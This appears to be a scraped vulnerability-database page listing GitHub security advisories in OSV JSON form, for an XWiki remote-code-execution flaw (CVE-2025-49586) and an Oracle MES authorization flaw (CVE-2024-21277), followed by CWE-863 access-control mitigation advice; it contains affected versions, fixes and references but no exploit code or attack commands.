"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13272"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/743556"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13272.json"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/37038"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-JP4X-W9CJ-97Q7
Vulnerability from github – Published: 2025-06-13 20:46 – Updated: 2025-06-13 20:46Impact
Any XWiki user with edit right on at least one App Within Minutes application (the default for all users XWiki) can obtain programming right/perform remote code execution by editing the application. The detailed reproduction steps can be found in the original bug report.
Patches
This vulnerability has been fixed in XWiki 17.0.0, 16.4.7, and 16.10.3.
Workarounds
Restricting edit rights on all existing App Within Minutes applications to trusted users mitigates at least the PoC exploit, but we can't exclude that there are other ways to exploit this vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "7.2-milestone-2"
},
{
"fixed": "16.4.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "16.5.0-rc-1"
},
{
"fixed": "16.10.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-oldcore"
},
"ranges": [
{
"events": [
{
"introduced": "17.0.0-rc-1"
},
{
"fixed": "17.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-49586"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-13T20:46:21Z",
"nvd_published_at": "2025-06-13T18:15:22Z",
"severity": "HIGH"
},
"details": "### Impact\nAny XWiki user with edit right on at least one App Within Minutes application (the default for all users XWiki) can obtain programming right/perform remote code execution by editing the application. The detailed reproduction steps can be found in the [original bug report](https://jira.xwiki.org/browse/XWIKI-22719).\n\n### Patches\nThis vulnerability has been fixed in XWiki 17.0.0, 16.4.7, and 16.10.3.\n\n### Workarounds\nRestricting edit rights on all existing App Within Minutes applications to trusted users mitigates at least the PoC exploit, but we can\u0027t exclude that there are other ways to exploit this vulnerability.",
"id": "GHSA-jp4x-w9cj-97q7",
"modified": "2025-06-13T20:46:22Z",
"published": "2025-06-13T20:46:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-jp4x-w9cj-97q7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49586"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/ef978315649cf83eae396021bb33603a1a5f7e42"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-22719"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XWiki allows remote code execution through preview of XClass changes in AWM editor"
}
GHSA-JP5H-88VF-2QP5
Vulnerability from github – Published: 2024-10-15 21:30 – Updated: 2024-10-15 21:30Vulnerability in the Oracle MES for Process Manufacturing product of Oracle E-Business Suite (component: Device Integration). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle MES for Process Manufacturing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle MES for Process Manufacturing accessible data as well as unauthorized access to critical data or complete access to all Oracle MES for Process Manufacturing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
{
"affected": [],
"aliases": [
"CVE-2024-21277"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-15T20:15:19Z",
"severity": "HIGH"
},
"details": "Vulnerability in the Oracle MES for Process Manufacturing product of Oracle E-Business Suite (component: Device Integration). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle MES for Process Manufacturing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle MES for Process Manufacturing accessible data as well as unauthorized access to critical data or complete access to all Oracle MES for Process Manufacturing accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).",
"id": "GHSA-jp5h-88vf-2qp5",
"modified": "2024-10-15T21:30:39Z",
"published": "2024-10-15T21:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21277"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
No CAPEC attack patterns related to this CWE.